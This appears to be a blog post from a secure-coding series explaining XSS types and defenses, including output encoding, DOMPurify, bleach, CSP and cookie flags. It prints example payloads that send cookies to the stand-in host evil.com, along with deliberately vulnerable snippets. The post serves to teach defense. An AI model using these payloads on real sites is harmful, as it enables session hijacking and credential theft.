XSS: When User Input Becomes Code
Security First — Part 17 of 30
The Dashboard That Wasn't Safe
Imagine you're a data engineer at a mid-sized company. You open a Grafana dashboard a colleague shared with you — your usual morning routine. Nothing looks out of place. No popup, no warning, no weird redirect. You scroll through the charts, close the tab, and get on with your day.
What you didn't see: a script ran silently in your browser the moment that page loaded. It harvested your Grafana session token and sent it to a server controlled by an attacker. By lunchtime, that attacker is logged in as you — with full access to your dashboards, your data sources, and everything connected to your observability stack.
This isn't a hypothetical. In April 2025, security researchers at SonarSource confirmed exactly this vulnerability in Grafana — tracked as CVE-2025-2703. An authenticated editor could embed malicious JavaScript inside an XY Charts panel configuration stored as JSON. When any user opened that dashboard, the script executed in their browser. Grafana fixed it in version 11.6.0, but unpatched instances running the default configuration remained sitting ducks.
This is Cross-Site Scripting — XSS — and it is far from dead.
What XSS Actually Is
SQL injection (which we covered in Part 16) tricks a database into executing attacker-supplied commands. XSS tricks a browser into executing attacker-supplied code.
The mechanism is deceptively simple: your web application takes input from a user, then later displays that input back on a page without properly neutralizing it. If that input contains HTML tags or JavaScript, the browser doesn't know it came from an attacker — it just runs it.
The results range from nuisance to catastrophic: session hijacking, credential theft, keylogging, silent redirects to phishing pages, and in some cases (as Microsoft's security team documented in November 2025) a path all the way to remote code execution when XSS is chained with other vulnerabilities.
There are three flavors you need to understand.
The Three Types of XSS
1. Reflected XSS
The payload travels in the URL and "reflects" off the server into the response. Nobody stores it — it lives only in a specially crafted link.
https://yourapp.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
The attacker sends that URL to victims (in a phishing email, a Slack message, a tweet). When the victim clicks it, the server echoes the q parameter back into the HTML, the browser executes the script, and the cookie is gone.
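The server-side fix is output encoding. Here's a minimal sketch in Python, using only the standard library; the function name and page markup are illustrative, not from any particular framework:

```python
import html

def render_search_results(query: str) -> str:
    """Build the search page heading, encoding the user-supplied query.

    A vulnerable handler would interpolate `query` directly:
        return f"<h1>Results for {query}</h1>"
    Escaping turns <, >, &, and quotes into HTML entities, so any
    script tag in the query renders as inert text instead of executing.
    """
    return f"<h1>Results for {html.escape(query)}</h1>"

payload = "<script>document.location='https://evil.com/steal'</script>"
page = render_search_results(payload)
assert "<script>" not in page  # the payload can no longer execute
```

The same principle applies in any stack: encode at the point where untrusted data meets HTML.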
Who it targets: Anyone who clicks the link. The attacker has to trick people into clicking — which is why it's considered slightly less severe than stored XSS.
2. Stored XSS
This is the Grafana scenario. The payload is saved to a database or persistent storage, then served to every user who views that content. No malicious link required — simply visiting the page triggers the attack.
In December 2025, CVE-2025-65858 was disclosed in Calibre-Web v0.6.25 — a popular self-hosted ebook management app. An admin could create a user account with a username like:
<script>fetch('https://evil.com/steal?c='+document.cookie)</script>
That username was stored in the database unsanitized. Every time another admin loaded the user list at /ajax/listusers, the script fired in their browser. Admins stealing from other admins — the attacker just needed a foothold.
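Whatever the storage layer, the reliable defense is encoding at render time. A stdlib-only Python sketch; the render function is hypothetical, loosely modeled on a user-list endpoint like the one above:

```python
import html

# Rows pulled from the database -- stored exactly as submitted
stored_usernames = [
    "alice",
    "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>",
]

def render_user_list(usernames):
    """Render the admin user list, escaping each stored name on output.

    Encoding here protects every page that displays the value, even if
    input validation was skipped when the account was created.
    """
    items = "".join(f"<li>{html.escape(name)}</li>" for name in usernames)
    return f"<ul>{items}</ul>"

page = render_user_list(stored_usernames)
assert "<script>" not in page  # the stored payload renders as inert text
```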
Similarly, CVE-2025-1623 in the GDPR Cookie Compliance WordPress plugin — installed on over 300,000 WordPress sites — allowed malicious JavaScript injected into a "Tracking ID" field to persist in plugin settings and execute on every page load. A stored XSS in a GDPR compliance tool. The irony writes itself.
3. DOM-Based XSS
This one never touches the server. The attack happens entirely in the browser, using JavaScript that reads from a URL fragment, window.location, or other browser APIs and writes it to the DOM without sanitizing it.
// Vulnerable: reads URL hash and injects directly into the page
const name = location.hash.slice(1);
document.getElementById('greeting').innerHTML = 'Hello, ' + name;

// Safe alternative: textContent treats the value as plain text, never markup
// document.getElementById('greeting').textContent = 'Hello, ' + name;
Navigate to yourapp.com/#<img src=x onerror=alert(1)> and that onerror handler fires. The server never saw the payload — there's no server log entry to alert on, no WAF rule that catches it.
DOM-based XSS is increasingly common in single-page applications built with React, Vue, or Svelte, precisely because developers assume the framework handles everything.
It does not.
Why React Doesn't Save You
React's JSX gives you genuine, meaningful protection out of the box. When you write:
function CommentDisplay({ userComment }) {
  return <div>{userComment}</div>;
}
React automatically escapes userComment. If someone submits <script>alert('xss')</script>, it renders as literal text on the page — <script>... — not executable code. For the vast majority of basic rendering, you're covered.
But React has escape hatches, and those are exactly where XSS re-enters.
The dangerouslySetInnerHTML Trap
The name tells you everything. React forces you to be explicit about bypassing its protection:
// React escaping bypassed entirely
function ArticleBody({ htmlContent }) {
  return <div dangerouslySetInnerHTML={{ __html: htmlContent }} />;
}
This pattern shows up legitimately all the time — rendering Markdown converted to HTML, displaying content from a CMS, embedding formatted email previews. The AI coding assistant you're using will generate this code and it will look perfectly reasonable in context. But if htmlContent ever contains user-supplied data that wasn't sanitized server-side, you have stored XSS.
The fix is one library:
import DOMPurify from 'dompurify';

function ArticleBody({ htmlContent }) {
  const clean = DOMPurify.sanitize(htmlContent);
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
DOMPurify strips anything executable while preserving safe formatting HTML. Add it as a reflex whenever you use dangerouslySetInnerHTML.
The href Attribute Problem
JavaScript URLs are valid in href attributes, and React does not block them:
// If userUrl comes from user input, this is an XSS vector
function UserLink({ userUrl, label }) {
  return <a href={userUrl}>{label}</a>;
}
An attacker sets their profile URL to javascript:fetch('https://evil.com/steal?c='+document.cookie). Every user who clicks that link runs the code.
The fix:
// Validate that the URL uses a safe protocol before rendering
function isSafeUrl(url) {
  try {
    const parsed = new URL(url);
    return ['https:', 'http:'].includes(parsed.protocol);
  } catch {
    return false;
  }
}

function UserLink({ userUrl, label }) {
  const safe = isSafeUrl(userUrl) ? userUrl : '#';
  return <a href={safe}>{label}</a>;
}
eval(), innerHTML, and document.write()
These are the classics. If your AI-generated code ever uses any of these on data that came from a user, a URL parameter, or an API response you don't fully control, treat it as a vulnerability until proven otherwise.
// All three of these are XSS waiting to happen if `data` is user-controlled
eval(data);                                          // parse structured data with JSON.parse instead
document.getElementById('target').innerHTML = data;  // use textContent for plain text
document.write(data);                                // build nodes with createElement/append instead
The XSS Defense Stack
No single measure is sufficient. Real protection is layered:
1. Output encoding by default. Use your framework's normal rendering: JSX {} interpolation in React, {{ }} in Vue and Jinja2. Never bypass it unless you have to.
2. Sanitize when you must render HTML. Use DOMPurify on the client or bleach (Python) on the server. Strip everything that isn't explicitly allowed.
import bleach

ALLOWED_TAGS = ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li']
ALLOWED_ATTRS = {'a': ['href', 'title']}

clean_content = bleach.clean(
    user_html,
    tags=ALLOWED_TAGS,
    attributes=ALLOWED_ATTRS,
    strip=True
)
3. Set a Content Security Policy (CSP) header. A CSP tells the browser which scripts are allowed to run. Inline scripts and scripts from unexpected domains get blocked — even if an XSS payload makes it through.
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
4. Mark cookies HttpOnly and Secure. HttpOnly cookies can't be read by JavaScript at all — which means an XSS attack can't steal them via document.cookie.
# Flask example
response.set_cookie('session', value, httponly=True, secure=True, samesite='Lax')
5. Validate URLs before rendering them in href or src attributes. Enforce https: or http: protocol. Block javascript:, data:, and vbscript:.
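The protocol check in item 5 is a few lines in any language. A server-side Python sketch using only the standard library (the helper name is an assumption):

```python
from urllib.parse import urlparse

SAFE_SCHEMES = {"http", "https"}

def is_safe_url(url: str) -> bool:
    """Allowlist the scheme. Rejects javascript:, data:, vbscript:,
    scheme-relative URLs, and anything that fails to parse."""
    try:
        scheme = urlparse(url).scheme.lower()
    except ValueError:
        return False
    return scheme in SAFE_SCHEMES

assert is_safe_url("https://example.com/profile")
assert not is_safe_url("javascript:alert(1)")
assert not is_safe_url("data:text/html,<script>alert(1)</script>")
```

Note that this rejects relative URLs as well; loosen the check only if your app genuinely needs to render them.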
What to Tell Your AI Coding Assistant
The patterns that create XSS vulnerabilities — dangerouslySetInnerHTML, innerHTML, eval(), dynamic href values — are all in the training data of every AI coding tool. They will be suggested. They will look right.
When generating any component that renders user-supplied content, add this to your prompt:
Sanitize all user-supplied content before rendering. Use DOMPurify for client-side HTML, bleach for server-side Python HTML, and validate all URL attributes to ensure they use only http: or https: protocols. Never use dangerouslySetInnerHTML with unsanitized input.
Make it a habit. The AI follows instructions; give it the right ones.
Quick-Reference Checklist
- Rendering user text? Use JSX `{}` or your framework's default escaping, never `innerHTML` or `eval()`
- Using `dangerouslySetInnerHTML`? Wrap the content in `DOMPurify.sanitize()` first, every time
- Rendering user-supplied URLs in `href` or `src`? Validate the protocol and allow only `http:` and `https:`
- Storing user content in a database? Sanitize on output, not just on input
- CSP header configured? Block inline scripts and unexpected external domains
- Session cookies marked `HttpOnly`? If yes, XSS can't steal them via `document.cookie`
- Using `eval()` anywhere? It's almost never necessary; audit and remove it
- Any libraries using `innerHTML` internally? Check your npm dependencies for known XSS CVEs regularly
Ask The Guild
This week's community prompt:
Pull up a project you've built or are currently working on. Search the codebase for these five strings: dangerouslySetInnerHTML, innerHTML, eval(, href={, document.write. For each one you find, drop into the Guild Discord and share: what it's doing, whether it touches user input, and how you'd fix it (or why you're confident it's already safe).
Bonus points if you find one you didn't know was there.
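If you'd rather script the hunt, here's a small stdlib-only Python sketch that walks a directory for those five strings. The extension list and starting path are assumptions; adjust them to your stack:

```python
from pathlib import Path

RISKY_PATTERNS = [
    "dangerouslySetInnerHTML", "innerHTML", "eval(", "href={", "document.write",
]
EXTENSIONS = {".js", ".jsx", ".ts", ".tsx", ".html"}

def scan(root):
    """Return (file, line number, pattern) for every risky hit under root."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix not in EXTENSIONS:
            continue
        for lineno, line in enumerate(
            path.read_text(errors="ignore").splitlines(), start=1
        ):
            for pattern in RISKY_PATTERNS:
                if pattern in line:
                    hits.append((str(path), lineno, pattern))
    return hits

# "src" is a placeholder for your project's source directory
for file, lineno, pattern in scan("src"):
    print(f"{file}:{lineno}: {pattern}")
```

A hit isn't automatically a vulnerability; the point is to force a deliberate look at each one.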
Next up — Part 18: Authentication Done Right. We'll cover password hashing, session management, and the JWT pitfalls that AI coding tools generate by default.
— Tom Hundley